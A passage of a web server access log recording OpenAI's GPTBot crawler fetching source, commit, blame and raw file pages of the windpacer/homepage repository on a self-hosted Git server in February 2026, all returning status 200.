74.7.227.38] [Length 10636] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 74.7.227.38] [Length 10749] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" -[17/Feb/2026:13:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" -[17/Feb/2026:13:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" [Client 74.7.227.38] [Length 9919] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" [Client 74.7.227.38] [Length 10566] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 74.7.227.38] [Length 11458] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 74.7.227.38] [Length 11483] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 74.7.227.38] [Length 11891] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" -[17/Feb/2026:13:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" [Client 74.7.227.38] [Length 10641] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 74.7.227.38] [Length 9837] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" -[17/Feb/2026:13:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" -[17/Feb/2026:13:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" [Client 74.7.227.38] [Length 9967] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 74.7.227.38] [Length 11611] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" -[17/Feb/2026:13:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" -[17/Feb/2026:13:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" -[17/Feb/2026:13:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" -[17/Feb/2026:13:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" -[17/Feb/2026:13:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 74.7.227.38] [Length 10780] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" -[17/Feb/2026:13:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 74.7.227.38] [Length 10729] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" -[17/Feb/2026:13:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" -[17/Feb/2026:13:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" -[17/Feb/2026:13:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" -[17/Feb/2026:13:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" -[17/Feb/2026:13:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 74.7.227.38] [Length 11208] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" -[17/Feb/2026:13:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 74.7.227.38] [Length 10827] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" -[17/Feb/2026:13:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" -[17/Feb/2026:13:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" -[17/Feb/2026:13:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" [Client 74.7.227.38] [Length 10695] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" -[17/Feb/2026:13:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" [Client 74.7.227.38] [Length 14128] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10739] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" -[17/Feb/2026:13:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10710] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" -[17/Feb/2026:13:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" [Client 74.7.227.38] [Length 9933] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" -[17/Feb/2026:13:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" [Client 74.7.227.38] [Length 14904] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" -[17/Feb/2026:13:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" [Client 74.7.227.38] [Length 10895] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" -[17/Feb/2026:13:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" [Client 74.7.227.38] [Length 10717] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" -[17/Feb/2026:13:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" [Client 74.7.227.38] [Length 14264] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 74.7.227.38] [Length 14870] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" -[17/Feb/2026:13:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" [Client 74.7.227.38] [Length 10097] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" -[17/Feb/2026:13:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 74.7.227.38] [Length 14900] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" -[17/Feb/2026:13:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" [Client 74.7.227.38] [Length 9821] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:13:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" [Client 74.7.227.38] [Length 9864] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" -[17/Feb/2026:13:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt" [Client 74.7.227.38] [Length 9832] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" -[17/Feb/2026:13:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" [Client 74.7.227.38] [Length 9862] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" -[17/Feb/2026:13:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 74.7.227.38] [Length 11232] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:13:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" -[17/Feb/2026:13:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" -[17/Feb/2026:13:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" [Client 74.7.227.38] [Length 9917] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" [Client 74.7.227.38] [Length 10563] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 74.7.227.38] [Length 11453] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 74.7.227.38] [Length 11480] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 74.7.227.38] [Length 11608] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" [Client 74.7.227.38] [Length 11149] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" [Client 74.7.227.38] [Length 9913] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" -[17/Feb/2026:13:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt" -[17/Feb/2026:13:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr 